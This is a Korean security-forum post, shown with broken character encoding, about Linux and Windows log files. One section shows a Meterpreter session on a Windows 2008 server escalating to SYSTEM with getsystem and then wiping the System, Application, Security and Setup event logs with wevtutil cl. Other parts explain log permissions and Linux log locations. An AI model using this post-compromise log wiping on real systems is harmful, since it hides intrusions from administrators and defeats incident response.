1586, 1/80 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ÇØÅ·ÀßÇÏ°í½Í´Ù
   http://¾øÀ½
   boot.png (507.4 KB), Download : 0     [¿À¸¥ÂÊ ¹öÆ° ´­·¯ ´Ù¿î ¹Þ±â]
   ¸®´ª½º/À©µµ¿ì º¸¾È Àåºñ ·Î±×

http://www.hackerschool.org/HS_Boards/zboard.php?desc=asc&no=8576 [º¹»ç]



(À̹ÌÁö´Â /var/log/boot ·Î±×ÀÇ ¿¹½Ã)









À©µµ¿ì : eventlog
¹ÙÀ̳ʸ® ÆÄÀÏ·Î ÀÛ¼ºµÈ´Ù.

- ¸ÞŸ½ºÇ÷ÎÀÕÀ¸·Î À©µµ¿ì ¼­¹ö ·Î±× ±â·Ï Áö¿ì±â -

[*] Sending stage (1189423 bytes) to 192.168.0.1

[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.1:49164) at 2017-11-10 21:29:00 +0900

msf exploit(handler) > sessions



Active sessions

===============



  Id  Type                     Information                      Connection

  --  ----                     -----------                      ----------

  1   meterpreter x64/windows  WIN2008\Administrator @ WIN2008


msf exploit(handler) > sessions -i 1

[*] Starting interaction with 1...



meterpreter >

meterpreter > getuid
Server username: WIN2008\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 636 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>wevtutil.exe el
wevtutil.exe el
Analytic
Application
....Áß·«.....
Microsoft-Windows-osk/Diagnostic
Microsoft-Windows-stobject/Diagnostic
Security
Setup
System
TabletPC_InputPanel_Channel
ThinPrint Diagnostics
WINDOWS_MP4SDECD_CHANNEL
WMPSetup
WMPSyncEngine
Windows PowerShell
microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin

C:\Windows\system32>wevtutil.exe cl "System"
wevtutil.exe cl "System"

C:\Windows\system32>wevtutil.exe cl "Application"
wevtutil.exe cl "Application"

C:\Windows\system32>wevtutil.exe cl "Security"
wevtutil.exe cl "Security"

C:\Windows\system32>wevtutil.exe cl "Setup"
wevtutil.exe cl "Setup"




- À̺¥Æ® ·Î±×¸¦ Áö¿ì´Â ¹æ¹ý -
1. À̺¥Æ® ºä¸¦ ½ÃÀÛÇÑ´Ù.
2. ÄÜ¼Ö Æ®¸®¿¡¼­ Áö¿ì·Á´Â À̺¥Æ® ·Î±×·Î À̵¿ÇÑ´Ù.
3. ÀÛ¾÷ ¸Þ´º¿¡¼­ "·Î±× Áö¿ì±â"¸¦ Ŭ¸¯ÇÑ´Ù.
4. À̺¥Æ® ·Î±×¸¦ Áö¿ì°Å³ª º¹»çÇÑ ÈÄ Áö¿ï ¼ö ÀÖ´Ù.
5. ¸í·É ÁÙÀ» »ç¿ëÇÏ¿© À̺¥Æ® ·Î±×¸¦ Áö¿ì´Â ¹æ¹ýÀº ´ÙÀ½°ú °°´Ù.

¸í·É ÇÁ·ÒÇÁÆ®¸¦ ¿­°í ´ÙÀ½ ¸í·ÉÀ» ÀÔ·ÂÇÑ´Ù.

wevtutil cl <·Î±× À̸§> [/bu:<¹é¾÷ ÆÄÀÏ À̸§>]

Ãß°¡ÀûÀ¸·Î °í·ÁÇØ¾ß ÇÒ »çÇ×Àº
ÀÌ ÀÛ¾÷À» ¼öÇàÇϱâ À§ÇØ ·Î±×¿¡ "Áö¿ì±â" ±ÇÇÑÀÌ ÀÖ¾î¾ß ÇÑ´Ù.
ÀϹÝÀûÀ¸·Î °ü¸®ÀÚ¿¡°Ô´Â ÀÌ ±ÇÇÑÀÌ ºÎ¿©µÈ´Ù.
´Ù¸¥ ±×·ì¿¡°Ô ·Î±×¿¡ ´ëÇÑ "Áö¿ì±â" ±ÇÇÑÀ» ¼³Á¤ÇÏ·Á¸é
´ÙÀ½°ú °°ÀÌ ¸í·ÉÀ» ÀÔ·ÂÇÏ¸é µÈ´Ù.

wevtutil sl <·Î±× À̸§> /ca:<º¸¾È ±â¼úÀÚ>

·Î±×¿¡ ´ëÇÑ SDDL(º¸¾È ±â¼úÀÚ Á¤ÀÇ ¾ð¾î) ¹®ÀÚ¿­À» º¸·Á¸é ´ÙÀ½ ¸í·ÉÀ» »ç¿ëÇÑ´Ù.

wevtutil gl <·Î±× À̸§>

¿¹¸¦ µé¾î, "¹é¾÷ ¿¬»êÀÚ" ±×·ì¿¡ ´ëÇÑ "ÀÀ¿ë ÇÁ·Î±×·¥"
·Î±×ÀÇ "Áö¿ì±â" ±ÇÇÑÀ» Ãß°¡ÇÏ´Â ¹æ¹ýÀº ´ÙÀ½°ú °°´Ù.

wevtutil sl ÀÀ¿ë ÇÁ·Î±×·¥ /ca:O:BAG:SYD:(A;;0xf0007;;;SY)(A;;0x7;;;B

·Î±× È®ÀÎ(À©µµ¿ì 2008±âÁØ)

½ÃÀÛ > Á¦¾îÆÇ > °ü¸®µµ±¸ > À̺¥Æ® ºä > Windows ·Î±×







¸®´ª½º : syslog (/var/log)
ÅؽºÆ®¸¦ ±â¹ÝÀ¸·Î ÀÛ¼ºµÈ´Ù.
ÇÏÁö¸¸ ¹ÙÀ̳ʸ®·Î ÀúÀåµÇ´Â °Íµµ ÀϺÎÀÖ´Ù.

#cat /var/log/messages
»ç¶÷ÀÌ Àϱâ ÆíÇÑ ÇüÅÂÀÇ ÅؽºÆ® ÆÄÀÏÀÌ´Ù.
½Ã½ºÅÛ º¯°æ »çÇ×µéÀÌ ÀúÀåµÇ¾î ÀÖ´Ù.
ħÇØ»ç°í´ëÀÀ¿¡¼­´Â ÀÌ ºÎºÐ¿¡¼­ À¯ÀǹÌÇÑ ·Î±×¸¦ ¹ß°ßÇϱ⠾î·Æ´Ù.
½Ã½ºÅÛ °ü¸®ÀÚÀÇ ·Î±×°¡ ¸¹Áö¸¸ ħÇØ»ç°í¿¡´Â º°·Î ¾ø´Ù.
ÇÏÁö¸¸ ²À È®ÀÎÀ» ÇؾßÇÑ´Ù.

#cat /var/log/auth.log
ÀÎÁõ ·Î±×, /var/log/secureµµ Á¸ÀçÇÑ´Ù.
¿ø°Ý ¶Ç´Â ·ÎÄà Á¢¼ÓµîÀÇ ·Î±× Á¤º¸°¡ Á¸ÀçÇÑ´Ù.

#cat /var/log/wtmp
»ç¿ëÀÚÀÇ ·Î±×ÀÎ/·Î±×¾Æ¿ô, ½Ã½ºÅÛ ºÎÆÃ/¼Ë´Ù¿î È÷½ºÅ丮 Á¤º¸

#cat /var/run/utmp
  Hit : 106     Date : 2024/05/20 10:42


    
     [°øÁö] °­Á¸¦ ¿Ã¸®½Ç ¶§´Â ¸»¸Ó¸®¸¦ ´Þ¾ÆÁÖ¼¼¿ä^¤Ñ^ [29] ¸Û¸Û 02/27 18921
1585   ÆÄÀ̽ã random¸ðµâÀ» ÀÌ¿ëÇÑ ¼ýÀÚ¸ÂÃ߱⠰ÔÀÓ ±¸Çö     ÇØÅ·ÀßÇÏ°í½Í´Ù
 05/30 205
1584   ÆÄÀ̽ã äÆà ÇÁ·Î±×·¥ ±¸Çö     ÇØÅ·ÀßÇÏ°í½Í´Ù
 05/28 89
1583   ÆÄÀ̽㠼ÒÄÏ ÇÁ·Î±×·¡¹ÖÀÇ ±âÃÊ     ÇØÅ·ÀßÇÏ°í½Í´Ù
 05/26 106
1582   ¸®´ª½º À¥ ·Î±× ºÐ¼®     ÇØÅ·ÀßÇÏ°í½Í´Ù
 05/20 100
  ¸®´ª½º/À©µµ¿ì º¸¾È Àåºñ ·Î±×     ÇØÅ·ÀßÇÏ°í½Í´Ù
 05/20 105
1580   °í¼ö´ÔµéÀÇ µµ¿òÀ» ¹Þ°í ½Í½À´Ï´Ù     vbnm111
 02/11 384
1579   ¸®´ª½º Ä¿³Î 2.6 ¹öÀü ÀÌÈÄÀÇ LKM     jdo
 07/25 884
1578   ½©ÄÚµå ¸ðÀ½     ÇØÅ·ÀßÇÏ°í½Í´Ù
 01/15 1709
1577   Call by value VS Call by Reference     ÇØÅ·ÀßÇÏ°í½Í´Ù
 01/15 1063
1576   (²Ä¼ö) L.O.B Çѹ濡 Ŭ¸®¾îÇϱâ[2]     ÇØÅ·ÀßÇÏ°í½Í´Ù
 01/14 1435
1575   towelroot.c (zip) ÄÚ¸àÆÃ.[1]     scube
 08/18 3947
1574   levitator.c (¾Èµå·ÎÀÌµå ·çÆÃ) °ø°Ý ºÐ¼® ¼Ò½º ÄÚµå °øÀ¯.[4]     scube
 08/17 3843
1573   ¹«·á Á¤º¸º¸¾È ±â¼úÀÎÀç ¾ç¼º °úÁ¤ ±³À°»ý ¸ðÁý     chanjung111
 06/17 4678
1572   K-Shield ÁִϾî 5±â ¸ðÁý     lrtk
 06/17 4393
1571   [ÆÁ] ÆÄÀ̽ã 2¼Ò½º¸¦ 3À¸·Î º¯°æÇØÁÖ´Â »çÀÌÆ®[3]     ÇѽÂÀç
 05/13 4089
1570   ±¸±Û ¹é¸µÅ© ÀÛ¾÷ Áú¹®¿ä     wkatnxka
 03/30 3509
1569   [ÆÁ] ¿ìºÐÅõ ¹Ì·¯¸µ¼­¹ö     ÇѽÂÀç
 03/09 4212
1568 ºñ¹Ð±ÛÀÔ´Ï´Ù  °¨À»¸øÀâ°Ú³×¿ä¤Ì¤Ì     À×À×À×
 01/15 3
1567   µ¥ºñ¾È °è¿­ ¸®´ª½º ÀÇÁ¸¼º ±úÁ³À»¶§ ÇØ°á¹ý     ÇѽÂÀç
 11/27 4697
1 [2][3][4][5][6][7][8][9][10]..[80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org